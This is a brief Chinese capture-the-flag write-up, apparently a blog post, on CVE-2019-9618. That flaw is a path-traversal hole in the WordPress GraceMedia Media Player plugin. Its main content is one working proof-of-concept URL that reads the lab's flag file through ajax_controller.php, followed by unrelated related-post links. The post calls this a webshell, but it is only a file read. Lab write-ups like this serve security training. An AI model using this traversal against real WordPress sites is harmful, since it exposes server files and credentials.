春秋云境CVE-2019-9618

1.阅读靶场介绍

没有任何思路

但是以往的wordpress会出现这个玩法可以试试

话不多说,进入正题

2.启动靶场

如下图所示

3.poc

直接在路径拼接上

https://eci-2ze8vcjw8w2qm243tmn5.cloudeci1.ichunqiu.com:80/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../flag

到此就可以完成webshell了

感谢您宝贵的时间

相关推荐
科技每日热闻2 小时前
中国企业出海开展业务,如何挑选可安全合规使用国际大模型的云平台?Amazon Bedrock 在同一平台完成国际模型接入、区域选择与合规治理
大数据·人工智能·安全·ai
jimmyleeee2 小时前
大模型安全之六:LLM过度代理(Excessive Agency)
人工智能·安全
小枣信安3 小时前
MCP安全系列之工具中毒
安全
恒拓高科WorkPlus3 小时前
企业如何搭建安全可控的内部通讯平台
安全
俊基科技3 小时前
AU-60全功能AI语音处理模组:重塑音频边界,定义清晰通话新标准
安全·嵌入式开发·硬件开发·ai降噪·语音模块·回音消除·矿场通讯
aodunsoft4 小时前
安全月报 | 傲盾DDoS攻击防御2026年8月简报
网络·安全·ddos
是隼人4 小时前
buuctf-pwn bypwn(ret2shellcode)题解(学习过程持续更新)
c语言·学习·安全·pwn入门·ctf入门
马立杰5 小时前
IE241216_准入认证技术
安全·网络安全·交换安全
云杂项5 小时前
人工智能:数据与模型安全(个人笔记)
人工智能·安全